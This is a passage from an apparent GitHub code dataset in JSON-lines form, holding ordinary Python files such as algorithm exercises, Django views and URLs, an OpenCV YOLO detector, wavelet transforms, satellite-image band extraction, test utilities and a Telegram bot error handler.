CM including only the undetected true label (Nan)\n mcm = confusion_matrix(pairs.name_true.fillna('NaN'), pairs.name_pred.fillna('NaN'), labels = pairs.fillna('NaN').name_true.unique())\n disp = ConfusionMatrixDisplay(confusion_matrix=mcm, display_labels=pairs.fillna('NaN').name_true.unique())\n fig, ax = plt.subplots(figsize=(10,10))\n disp.plot(xticks_rotation='vertical', ax=ax, values_format=\"d\")\n plt.savefig(os.path.join(test_directory, 'cm_inclNaN.svg'), format=\"svg\")\n\n #plot_confusion_matrix(mcm, np.append(pairs.name_true.unique(), 'NaN'),\n # write=os.path.join(output_directory, \"test_results/cm_inclNaN.png\"))\n\n # 4. CM including only the undetected true label (Nan), normalized\n mcm = mcm.astype('float') / mcm.sum(axis=1)[:, np.newaxis] * 100\n mcm = np.nan_to_num(mcm.round(1))\n disp = ConfusionMatrixDisplay(confusion_matrix=mcm, display_labels=pairs.fillna('NaN').name_true.unique())\n fig, ax = plt.subplots(figsize=(10,10))\n disp.plot(xticks_rotation='vertical', ax=ax, values_format=\".1f\")\n plt.savefig(os.path.join(test_directory, 'cm_norm_inclNaN.svg'), format=\"svg\")\n\n print(\"\\n---------------Finished Evaluation---------------\")\n\n return pairs, cls_value_counts, df_ttruth, df_pred\n","repo_name":"stasys-hub/Collembola_AI","sub_path":"src/evaluate/evaluation_functions.py","file_name":"evaluation_functions.py","file_ext":"py","file_size_in_byte":20403,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"74905354705","text":"# 0을 완료하기 위해서는 1을 끝내야 한다는 것을 [0,1] 쌍으로 표현하는 n개의 코스가 있다.\n# 코스 개수 n과 이 쌍들을 입력으로 받았을 때 모든 코스가 완료 가능한지 판별하라.\nimport collections\ndef canFinish(numcCourses, prerequisites):\n graph = collections.defaultdict(list)\n # 그래프 구성\n for x, y in prerequisites:\n graph[x].append(y)\n\n traced = set()\n visited = set()\n\n def dfs(i):\n # 순환 구조이면 False\n if i in traced:\n return False\n # 이미 방문햇던 노드이면 True\n if i in visited:\n return True\n\n traced.add(i)\n for y in graph[i]:\n if not dfs(y):\n return False\n # 탐색 종료 후 순환 노드 삭제\n traced.remove(i)\n # 탐색 종료 후 방문 노드 추가\n visited.add(i)\n\n return True\n # 순환 구조 판별\n for x in list(graph):\n if not dfs(x):\n return False\n return True\n \n\n\n","repo_name":"limnyn/python_codingtest","sub_path":"Algorithm_Interview/39_코드스케줄.py","file_name":"39_코드스케줄.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33377747205","text":"def hill_climbing(problem):\n current = problem.initial()\n while True:\n neighbors = problem.neighbors(current)\n if not neighbors:\n break\n next_ = max(neighbors, key=problem.value)\n if problem.value(next_) <= problem.value(current):\n break\n current = next_\n return current\n #only implementation","repo_name":"Tri-M/Semester-6","sub_path":"AI/hill_climb.py","file_name":"hill_climb.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725283026","text":"\"\"\"\n给你一棵根为 root 的二叉树,请你返回二叉树中好节点的数目。\n\n“好节点”X 定义为:从根到该节点 X 所经过的节点中,没有任何节点的值大于 X 的值。\n\"\"\"\nclass Solution(object):\n def goodNodes(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.res = 0\n self.dfs(root, float('-inf'))\n return self.res\n\n def dfs(self, root, maxValue):\n if not root:\n return\n if root.val >= maxValue:\n self.res += 1\n self.dfs(root.left, max(root.val, maxValue))\n self.dfs(root.right, max(root.val, 
maxValue))\n\n\"\"\"\nhttps://www.youtube.com/watch?v=10-xBLiytBA&t=95s 16:35\n自上而下传递当前path到目前为止的最大值,假如当前节点>=这条path之前的最大值,则记录\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Tree/古城-信息的传递/1448. 统计二叉树中好节点的数目(自上而下).py","file_name":"1448. 统计二叉树中好节点的数目(自上而下).py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2481028509","text":"def factorize(num):\n factors = [1]\n for i in range(2, int(num**0.5 + 1)):\n if (num % i == 0):\n if (i == num ** 0.5):\n factors.append(i)\n else:\n factors.extend([i, int(num / i)])\n return(factors)\n \ndef organize(num):\n return (sum(factorize(num)))\n\ndef amicable(limit):\n skippers = []\n amics = []\n for i in range(2, limit + 1):\n if (i in skippers): continue\n\n if (i == organize(organize(i))):\n if (i == organize(i)): continue\n else: amics.extend([i, organize(i)])\n skippers.append(organize(i))\n return(amics)\n\n\nprint(sum(amicable(10_000)))","repo_name":"arefmalek/ProjectEulerProblems","sub_path":"Problems/problem21/p21.py","file_name":"p21.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32658973679","text":"import sys\n\n# 배열을 입력받는다. 연산의 최종결과는 answer 배열처럼 나와야 한다 \narray = list(map(int, sys.stdin.readline().split()))\nanswer = sorted(array)\n\nwhile True :\n\n # 1. 첫번째가 두번째 수보다 크다면 서로 맞바꾼다. 먄약, 오름차순정렬이 완료되면 루프문을 종료한다.\n if array[0] > array[1] :\n array[0],array[1] = array[1], array[0]\n print(*array)\n if array == answer :\n break\n \n # 2. 두번째가 세번째 수보다 크다면 서로 맞바꾼다. 먄약, 오름차순정렬이 완료되면 루프문을 종료한다.\n if array[1] > array[2] :\n array[1],array[2] = array[2], array[1]\n print(*array)\n if array == answer :\n break\n\n # 3. 세번째가 네번째 수보다 크다면 서로 맞바꾼다. 먄약, 오름차순정렬이 완료되면 루프문을 종료한다. \n if array[2] > array[3] :\n array[2],array[3] = array[3], array[2]\n print(*array)\n if array == answer :\n break\n \n # 4. 네번째가 다섯번째 수보다 크다면 서로 맞바꾼다. 
먄약, 오름차순정렬이 완료되면 루프문을 종료한다.\n if array[3] > array[4] :\n array[3],array[4] = array[4], array[3]\n print(*array)\n if array == answer :\n break\n \n \n# print(array)\n# print(answer)","repo_name":"KimHyungkeun/Algorithm","sub_path":"Baekjoon/구현/2947_나무조각.py","file_name":"2947_나무조각.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2384102516","text":"from distutils.core import setup, Extension\nimport setup_translate\n\npkg = 'Extensions.openHAB'\nsetup (name = 'enigma2-plugin-extensions-openhab',\n version = '0.7',\n description = 'Simple openHAB client for Enigma2',\n package_dir = {pkg: 'src'},\n packages = [pkg],\n package_data = {pkg: ['../LICENSE', '*.png', '../po/*/LC_MESSAGES/*.mo']},\n cmdclass = setup_translate.cmdclass, # for translation\n)\n","repo_name":"druciak/enigma2-plugin-openhab","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"38294706659","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom webtest.models import WebCase, WebCaseStep\n\n\n# Create your views here.\n\n\ndef webCase(request):\n message = ''\n if not request.session.get('is_login', None):\n message = 'Please login before browse app case Manage Page.'\n return HttpResponseRedirect('/login/')\n else:\n webcase_list = WebCase.objects.all()\n return render(request, 'webcase.html',\n {\n 'webcases': webcase_list\n })\n\n\ndef webCaseStep(request):\n message = ''\n if not request.session.get('is_login', None):\n message = 'Please login before browse app case Manage Page.'\n return HttpResponseRedirect('/login/')\n else:\n webstep_list = WebCaseStep.objects.all()\n return render(request, 'webcasestep.html',\n {\n 'webcasesteps': webstep_list\n })\n","repo_name":"Jimmax-w/AutoTest","sub_path":"webtest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16362978030","text":"from pathlib import Path\nimport time\n\nimport cv2\nimport numpy as np\n\nfrom Model import Model\n\n\nclass YoloModel(Model):\n def __init__(self,\n engine,\n size=320,\n config_path='models/YOLOv3/YOLOv3.cfg',\n weights_path='models/YOLOv3/YOLOv3.weights'):\n super().__init__()\n\n self.size = size\n self.confThreshold = 0.5\n self.nmsThreshold = 0.4\n\n assert size in [\n 512], f'Net size {size} not in [512]'\n assert Path(config_path).is_file() and Path(\n weights_path).is_file(), 'Not find config or weights file'\n\n self.net = cv2.dnn.readNetFromDarknet(config_path, weights_path)\n\n def setPreferableEngine(engine):\n if engine == 'gpu':\n self.net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\n self.net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n else:\n self.net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\n self.net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n setPreferableEngine(engine)\n\n def getOutputsNames(net):\n layersNames = net.getLayerNames()\n return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n self.outputs = getOutputsNames(self.net)\n\n def get_GFLOPS(self):\n return self.net.getFLOPS((1,3,512,512))*1e-9\n\n def preprocess(self, frames):\n return frames\n\n def inference(self, frames):\n blob = cv2.dnn.blobFromImages(images=frames, scalefactor=1./255., size=(\n self.size, 
self.size), mean=(0, 0, 0), swapRB=True, crop=False)\n self.net.setInput(blob)\n return self.net.forward(self.outputs)\n\n def predict(self, frames):\n st = time.time()\n frames = self.preprocess(frames)\n self.preprocess_time += (time.time() - st)\n\n st = time.time()\n outs = self.inference(frames)\n self.inference_time += (time.time() - st)\n\n st = time.time()\n a, b, c = outs\n if len(frames) == 1:\n a, b, c = [a], [b], [c]\n\n boxes = []\n for i in range(len(frames)):\n box = self.postprocess(frames[i], (a[i], b[i], c[i]))\n boxes.append((frames[i], box))\n\n self.postprocess_time += (time.time() - st)\n\n self.count += len(frames)\n\n return boxes\n\n def postprocess(self, frame, outs):\n frameHeight = frame.shape[0]\n frameWidth = frame.shape[1]\n\n classIds = []\n confidences = []\n boxes = []\n # Scan through all the bounding boxes output from the network and keep only the\n # ones with high confidence scores. Assign the box's class label as the class with the highest score.\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > self.confThreshold:\n center_x = int(detection[0] * frameWidth)\n center_y = int(detection[1] * frameHeight)\n width = int(detection[2] * frameWidth)\n height = int(detection[3] * frameHeight)\n left = int(center_x - width / 2)\n top = int(center_y - height / 2)\n classIds.append(classId)\n confidences.append(float(confidence))\n boxes.append([left, top, width, height])\n\n # Perform non maximum suppression to eliminate redundant overlapping boxes with\n # lower confidences.\n indices = cv2.dnn.NMSBoxes(\n boxes, confidences, self.confThreshold, self.nmsThreshold)\n\n results = []\n for i in indices:\n i = i[0]\n box = boxes[i]\n left = box[0]\n top = box[1]\n width = box[2]\n height = box[3]\n results.append((classIds[i], confidences[i],\n left, top, left + width, top + height))\n\n return results\n","repo_name":"bartoszptak/Efficient_Object_Detection_Algorithms_Research","sub_path":"YoloModel.py","file_name":"YoloModel.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"11964230772","text":"from typing import *\nimport logging\n\nimport umsgpack\n\nimport asm2vec.model\n\n\n_model: Optional[asm2vec.model.Asm2Vec] = None\n\n\ndef init_asm2vec(model_file_name: str) -> None:\n logging.info('Initializing asm2vec from file \"%s\"', model_file_name)\n\n memento = asm2vec.model.Asm2VecMemento()\n with open(model_file_name, 'rb') as fp:\n memento_data = umsgpack.unpack(fp)\n memento.populate(memento_data)\n\n global _model\n _model = asm2vec.model.Asm2Vec()\n _model.set_memento(memento)\n\n\ndef get_asm2vec() -> asm2vec.model.Asm2Vec:\n return _model\n\n\n__all__ = ['init_asm2vec', 'get_asm2vec']\n","repo_name":"Lancern/vul-classify","sub_path":"vulcls/asm/asm2vec.py","file_name":"asm2vec.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15214754221","text":"# Test for dir2exercise utilities\n\nfrom pathlib import Path\nimport os.path as op\nimport shutil\nfrom pathlib import Path\n\nHERE = op.realpath(op.dirname(__file__))\nDATA_DIR = op.join(HERE, 'data')\nTHREE_GIRLS = op.join(DATA_DIR, 'three_girls')\nTHREE_GIRLS_EXTRA = op.join(DATA_DIR, 'three_girls_extra')\n\n\nfrom tempfile import TemporaryDirectory\nfrom 
oktools.cutils import (get_site_dict, write_ipynb, process_dir,\n grade_path, write_dir)\n\nimport pytest\n\n\ndef test_get_site_dict():\n # Check prefer course.yml to _config.yml\n fn1 = op.realpath(op.join(DATA_DIR, 'course.yml'))\n assert get_site_dict(fn1) == {'baseurl': 'https://foo.github.com/bar',\n 'baz': 'bong'}\n fn2 = op.realpath(op.join(DATA_DIR, '_config.yml'))\n assert (get_site_dict(fn2)['baseurl'] ==\n 'https://matthew-brett.github.io/cfd2019')\n\n\ndef test_smoke_and_fails():\n base_nb_root = 'three_girls'\n with TemporaryDirectory() as tmpdir:\n tmp_3g = op.join(tmpdir, 'three_girls')\n shutil.copytree(THREE_GIRLS, tmp_3g)\n tmp_nb_in = op.join(tmp_3g, base_nb_root + '_template.Rmd')\n tmp_ex_out = op.join(tmp_3g, base_nb_root + '.ipynb')\n assert op.isfile(tmp_nb_in)\n assert not op.isfile(tmp_ex_out)\n process_dir(tmp_3g)\n assert not op.isfile(tmp_ex_out)\n write_ipynb(tmp_3g, 'exercise')\n assert op.isfile(tmp_ex_out)\n grade_path(tmp_3g)\n tmp_out = op.join(tmpdir, 'out_path')\n write_dir(tmp_3g, tmp_out)\n assert op.isdir(tmp_out)\n assert op.isdir(op.join(tmp_out, 'tests'))\n all_files = [str(p) for p in Path(tmp_out).rglob('*')]\n z_list = sorted(op.relpath(f, tmp_out) for f in all_files)\n assert z_list == [\n 'tests',\n 'tests/__init__.py',\n 'tests/q_1_no_girls.py',\n 'tests/q_2_three_of_five.py',\n 'tests/q_3_three_or_fewer.py',\n 'tests/q_4_r_three_of_four.py',\n 'three_girls.ipynb',\n 'three_girls.ok']\n # Test failing exercise causes error.\n bad_ex_fname = op.join(tmp_3g, 'tests', 'q_5.py')\n with open(bad_ex_fname, 'wt') as fobj:\n fobj.write('''\ntest = {\n 'name': 'Question 5',\n 'points': 20,\n 'suites': [\n {\n 'cases': [\n {\n 'code': r\"\"\"\n >>> False\n True\n \"\"\",\n 'hidden': False,\n 'locked': False\n },\n ],\n 'scored': True,\n 'setup': '',\n 'teardown': '',\n 'type': 'doctest'\n }\n ]\n}''')\n process_dir(tmp_3g)\n write_ipynb(tmp_3g, 'exercise')\n with pytest.raises(RuntimeError):\n grade_path(tmp_3g)\n\n\ndef test_proc_test():\n # Test extras removed\n with TemporaryDirectory() as tmpdir:\n tmp_3g = op.join(tmpdir, 'three_girls')\n shutil.copytree(THREE_GIRLS_EXTRA, tmp_3g)\n tmp_out = op.join(tmpdir, 'out_path')\n write_dir(tmp_3g, tmp_out)\n out_test_pth = Path(tmp_out) / 'tests' / 'q_1_no_girls.py'\n out_test_text = out_test_pth.read_text()\n assert '-extra' not in out_test_text\n assert '>>> True' not in out_test_text\n out_test_pth = Path(tmp_out) / 'tests' / 'q_3_three_or_fewer.py'\n out_test_text = out_test_pth.read_text()\n assert '-extra' not in out_test_text\n # Test sandwiched between two sections to remove.\n assert \"'p_3_or_fewer' in vars()\" in out_test_text\n assert '>>> False' not in out_test_text\n assert \">>> 'two'\" not in out_test_text\n # Try using with_extras flag.\n tmp_out = op.join(tmpdir, 'unstripped')\n write_dir(tmp_3g, tmp_out, with_extras=True)\n out_test_pth = Path(tmp_out) / 'tests' / 'q_1_no_girls.py'\n out_test_text = out_test_pth.read_text()\n assert '-extra' in out_test_text\n assert '>>> True' in out_test_text\n out_test_pth = Path(tmp_out) / 'tests' / 'q_3_three_or_fewer.py'\n out_test_text = out_test_pth.read_text()\n assert '-extra' in out_test_text\n # Test sandwiched between two sections to remove.\n assert \"'p_3_or_fewer' in vars()\" in out_test_text\n assert '>>> False' in out_test_text\n assert \">>> 'two'\" in 
out_test_text\n","repo_name":"matthew-brett/oktools","sub_path":"oktools/tests/test_dir2exercise.py","file_name":"test_dir2exercise.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31135898370","text":"# Genuary 2022, Jan 5\n# Task: Destroy a Square\n# Idea: Draw a Square then shuffle all the xy coords\n\n# import python libraries, install with 'pip install ....'\nimport numpy as np\nimport pandas as pd\nimport random as rn\n\n# create a square path using x & y coords\nx = list(range(0,24)) + [24]*25 + list(range(24,-1,-1)) + [0]*25\ny = [0]*25 + list(range(0,24)) + [24]*25 + list(range(24,-1,-1))\npath = list(range(0,len(x)))\n\n# create new positions for the xy coords\nnew_x = [rn.uniform(0, 24) for p in range(0, len(x))]\nnew_y = [rn.uniform(0, 24) for p in range(0, len(x))]\n\n# create data frame for square\nd = {'x': x, 'y': y,'path': path,'stage':1}\ndf = pd.DataFrame(data=d)\n\n# create data frame for square after being shuffled\nd_new = {'x': new_x, 'y': new_y,'path': path,'stage':2}\ndf_new = pd.DataFrame(data=d_new)\n\n# combine data frames\ndf = pd.concat([df,df_new])\n\n# write data to csv\ndf.to_csv('data\\\\05_destroy_a_square.csv', encoding='utf-8-sig', index=False)\n","repo_name":"wjsutton/genuary_2022","sub_path":"05_destroy_a_square.py","file_name":"05_destroy_a_square.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37536917519","text":"import sys\n\nchar_pairs = {\n '(': ')',\n '[': ']',\n '{': '}',\n '<': '>'\n}\n\nillegal_character_scores = {\n ')': 3,\n ']': 57,\n '}': 1197,\n '>': 25137\n}\n\nsyntax_error_score = 0\n\nfor line in sys.stdin:\n chunk_stack = []\n illegal_char = None\n\n for char in line:\n if char in char_pairs.keys():\n chunk_stack.append(char_pairs[char])\n elif char in char_pairs.values():\n expected_char = chunk_stack.pop()\n\n if char != expected_char:\n illegal_char = char\n break\n\n if illegal_char is not None:\n syntax_error_score += illegal_character_scores[illegal_char]\n\nprint(syntax_error_score)\n","repo_name":"cycleseven/advent-2021","sub_path":"10/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6914608501","text":"import numpy as np\nimport h5py\nfrom pyhdf.SD import SD, SDC\nimport gdal\nimport os\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\n\n# f = h5py.File('MYD09GA.A2019116.h10v05.006.2019118025813.hdf', 'r')\n# ls = list(f.keys())\n# f.close()\n\n# print(ls)\n\ndef updateGeoTransforms(srcGeo, xOff, yOff):\n \"\"\"\n Create a new geotransform list based on a source geoTransform and an offset\n Returns a list of 6\n :param srcGeo: The geoTransfor of the uncroped dataset retrieved using GetGeoTransform()\n :param xOff: x offset used for cropping\n :param yOff: y offset used for cropping\n \"\"\"\n out = [srcGeo[0] + xOff * srcGeo[1], srcGeo[1], srcGeo[2], srcGeo[3] + yOff * srcGeo[5], srcGeo[4], srcGeo[5]]\n return out\n\n\n\ndirectory = os.getcwd() + '\\\\MQ\\\\'\npathlist = Path(directory).iterdir()\n\nfor path in pathlist:\n\n\n #name = 'MYD09GA.A2019116.h10v05.006.2019118025813.hdf'\n #sds = gdal.Open(name, gdal.GA_ReadOnly).GetSubDatasets()\n\n sds = gdal.Open(str(path), gdal.GA_ReadOnly).GetSubDatasets()\n\n #print(sds[1])\n\n vi = gdal.Open(sds[1][0])\n vi_np = 
vi.ReadAsArray()\n #print(vi_np.shape)\n\n #plt.imshow(vi_np)\n #plt.show()\n\n geoT = vi.GetGeoTransform()\n proj = vi.GetProjection()\n\n filename = str(os.path.basename(path))[:str(os.path.basename(path)).find(\".hdf\")] + '_B1.tif'\n ##outfile_name = 'new.tif'\n\n\n driver = gdal.GetDriverByName('GTiff')\n\n width = 4800\n height = 4800\n xOff = 0\n yOff = 0\n\n #dataset = driver.Create(filename, width, height, 1, gdal.GDT_Int16)\n dataset = driver.Create(filename, width, height, 1, gdal.GDT_UInt16)\n dataset.SetGeoTransform(updateGeoTransforms(geoT, xOff, yOff))\n dataset.SetProjection(proj)\n dataset.GetRasterBand(1).SetNoDataValue(0)\n dataset.GetRasterBand(1).WriteArray(vi_np)","repo_name":"Rohit18/DREDN","sub_path":"SampleData/DataPrep/MODISbandextract.py","file_name":"MODISbandextract.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"18565458494","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\ndef Normalize(x):\r\n ymax = 255\r\n ymin = 0\r\n xmax = x.max()\r\n xmin = x.min()\r\n return (ymax-ymin)*(x-xmin)/(xmax-xmin) + ymin\r\n\r\n\r\ndef dwt_init(x):\r\n\r\n x01 = x[:, :, 0::2, :] / 2\r\n x02 = x[:, :, 1::2, :] / 2\r\n x1 = x01[:, :, :, 0::2]\r\n x2 = x02[:, :, :, 0::2]\r\n x3 = x01[:, :, :, 1::2]\r\n x4 = x02[:, :, :, 1::2]\r\n x_LL = x1 + x2 + x3 + x4\r\n x_HL = -x1 - x2 + x3 + x4\r\n x_LH = -x1 + x2 - x3 + x4\r\n x_HH = x1 - x2 - x3 + x4\r\n\r\n return torch.cat((x_LL, x_HL, x_LH, x_HH), 0)\r\n\r\n\r\n# 使用哈尔 haar 小波变换来实现二维离散小波\r\ndef iwt_init(x):\r\n r = 2\r\n in_batch, in_channel, in_height, in_width = x.size()\r\n out_batch, out_channel, out_height, out_width = int(in_batch/(r**2)),in_channel, r * in_height, r * in_width\r\n x1 = x[0:out_batch, :, :] / 2\r\n x2 = x[out_batch:out_batch * 2, :, :, :] / 2\r\n x3 = x[out_batch * 2:out_batch * 3, :, :, :] / 2\r\n x4 = x[out_batch * 3:out_batch * 4, :, :, :] / 2\r\n\r\n h = torch.zeros([out_batch, out_channel, out_height,\r\n out_width]).float().to(x.device)\r\n\r\n h[:, :, 0::2, 0::2] = x1 - x2 - x3 + x4\r\n h[:, :, 1::2, 0::2] = x1 - x2 + x3 - x4\r\n h[:, :, 0::2, 1::2] = x1 + x2 - x3 - x4\r\n h[:, :, 1::2, 1::2] = x1 + x2 + x3 + x4\r\n\r\n return h\r\n\r\n\r\nclass DWT(nn.Module):\r\n def __init__(self):\r\n super(DWT, self).__init__()\r\n self.requires_grad = False # 信号处理,非卷积运算,不需要进行梯度求导\r\n\r\n def forward(self, x):\r\n return dwt_init(x)\r\n\r\n\r\nclass IWT(nn.Module):\r\n def __init__(self):\r\n super(IWT, self).__init__()\r\n self.requires_grad = False\r\n\r\n def forward(self, x):\r\n return iwt_init(x)\r\n","repo_name":"JianghaiSCU/Diffusion-Low-Light","sub_path":"models/wavelet.py","file_name":"wavelet.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"48"} +{"seq_id":"74392143826","text":"import asyncio\nimport html\nimport io\nimport random\nimport sys\nimport traceback\n\nimport pretty_errors\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update\nfrom telegram.ext import CallbackContext, CommandHandler\n\nfrom NekoRobot import DEV_USERS, ERROR_LOGS, NEKO_PTB\n\nfrom ..utils.pastebin import paste\n\npretty_errors.mono()\n\n\nclass ErrorsDict(dict):\n \"\"\"A custom dict to store errors and their count\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.raw = []\n super().__init__(*args, **kwargs)\n\n def __contains__(self, error):\n self.raw.append(error)\n error.identifier = 
\"\".join(random.choices(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\", k=5))\n for e in self:\n if type(e) is type(error) and e.args == error.args:\n self[e] += 1\n return True\n self[error] = 0\n return False\n\n def __len__(self):\n return len(self.raw)\n\n\nerrors = ErrorsDict()\n\n\ndef error_callback(update: Update, context: CallbackContext):\n if not update:\n return\n if context.error not in errors:\n try:\n stringio = io.StringIO()\n pretty_errors.output_stderr = stringio\n output = pretty_errors.excepthook(\n type(context.error),\n context.error,\n context.error.__traceback__,\n )\n pretty_errors.output_stderr = sys.stderr\n pretty_error = stringio.getvalue()\n stringio.close()\n except:\n pretty_error = \"Failed to create pretty error.\"\n tb_list = traceback.format_exception(\n None,\n context.error,\n context.error.__traceback__,\n )\n tb = \"\".join(tb_list)\n pretty_message = f'{pretty_error}\\n-------------------------------------------------------------------------------\\nAn exception was raised while handling an update\\nUser: {update.effective_user.id}\\nChat: {update.effective_chat.title if update.effective_chat else \"\"} {update.effective_chat.id if update.effective_chat else \"\"}\\nCallback data: {update.callback_query.data if update.callback_query else \"None\"}\\nMessage: {update.effective_message.text if update.effective_message else \"No message\"}\\n\\nFull Traceback: {tb}'\n\n e = html.escape(f\"{context.error}\")\n link = asyncio.run(paste(pretty_message))\n context.bot.send_message(\n ERROR_LOGS,\n text=f\"#{context.error.identifier}\\nAn Error has occurred:\"\n f\"\\n{e}\",\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(\"See Errors\", url=link)]],\n ),\n parse_mode=\"html\",\n )\n\n\ndef list_errors(update: Update, context: CallbackContext):\n if update.effective_user.id not in DEV_USERS:\n return\n e = dict(sorted(errors.items(), key=lambda item: item[1], reverse=True))\n msg = \"Errors List:\\n\"\n for x, value in e.items():\n msg += f\"• {x}: {value} #{x.identifier}\\n\"\n msg += f\"{len(errors)} have occurred since startup.\"\n if len(msg) > 4096:\n with open(\"errors_msg.txt\", \"w+\") as f:\n f.write(msg)\n context.bot.send_document(\n update.effective_chat.id,\n open(\"errors_msg.txt\", \"rb\"),\n caption=\"Too many errors have occured..\",\n parse_mode=\"html\",\n )\n return\n update.effective_message.reply_text(msg, parse_mode=\"html\")\n\n\nNEKO_PTB.add_error_handler(error_callback)\nNEKO_PTB.add_handler(CommandHandler(\"errors\", list_errors))\n","repo_name":"Awesome-Prince/NekoRobot-3","sub_path":"NekoRobot/modules/error_handling.py","file_name":"error_handling.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"38435146120","text":"from django.urls import path\nfrom . 
import views\nurlpatterns = [\n\n path('', views.index),\n path('loginsignup/', views.loginsignup),\n path('signup/', views.signup),\n path('loginuser/', views.loginuser),\n path('logoutuser/', views.logoutuser),\n path('profile/', views.profile),\n path('letsprofile/', views.letsprofile),\n path('buy/', views.buy),\n path('sell/', views.sell),\n path('letssell/', views.letssell),\n path('news/', views.news),\n path('winner/', views.winner),\n path('letsbuy/', views.letsbuy),\n path('letsbuymb/', views.letsbuymb),\n path('letsupdatetime/', views.letsupdatetime),\n path('letsupdatetext/', views.letsupdatetext),\n]\n","repo_name":"sns5154/Bazaar---PDPU","sub_path":"bnb/bazaar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71586814867","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url('^login/$', views.login, name='login'),\n url('^logout/$', views.logout, name='logout'),\n url(r'^health/messages/$', views.health_messages, name='health_messages'),\n url(r'^health/subscriptions/$', views.health_subscriptions,\n name='health_subscriptions'),\n url(r'^health/registrations/$', views.health_registrations,\n name='health_registrations'),\n url(r'^dashboard/(?P\\d+)/', views.dashboard,\n name='dashboard'),\n url('^api/v1/metric/$', views.dashboard_metric, name='dashboard_metric'),\n url('^identities/$', views.identities, name='identities'),\n url(r'^identities/(?P[^/]+)/$', views.identity,\n name='identities-detail'),\n\n url('^registrations/$', views.registrations, name='registrations'),\n url(r'^registrations/(?P[^/]+)/$', views.registration,\n name='registrations-detail'),\n url('^changes/$', views.changes, name='changes'),\n url(r'^changes/(?P[^/]+)/$', views.change,\n name='changes-detail'),\n url('^subscriptions/$', views.subscriptions, name='subscriptions'),\n url(\n '^failures/subscriptions/$',\n views.subscription_failures,\n name='subscription_failures'\n ),\n url(\n '^failures/schedules/$',\n views.schedule_failures,\n name='schedule_failures'\n ),\n url(\n '^failures/outbound/$',\n views.outbound_failures,\n name='outbound_failures'\n ),\n url(r'^subscriptions/(?P[^/]+)/$', views.subscription,\n name='subscriptions-detail'),\n url('^services/$', views.services, name='services'),\n url('^reports/$', views.report_generation, name='reports'),\n url(r'^services/(?P[^/]+)/$', views.service,\n name='services-detail'),\n url('^user_management/$', views.user_management, name='user_management'),\n url(r'^user_management/(?P[^/]+)/$',\n views.user_management_detail, name='user-management-detail'),\n url('^denied/$', views.denied, name='denied'),\n url('^404/$', views.denied, name='not_found'),\n url('', views.index, name='index'),\n]\n","repo_name":"praekeltfoundation/seed-control-interface","sub_path":"ci/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74001963346","text":"import json\nimport os\nfrom pathlib import Path\nimport logging\n\nFOLDER_NAME = \"OutputFiles\"\nFILE_NAME = \"Query_Execution_Summary.txt\"\n\n# Query_Execution_Summary category is defined within such lines. 
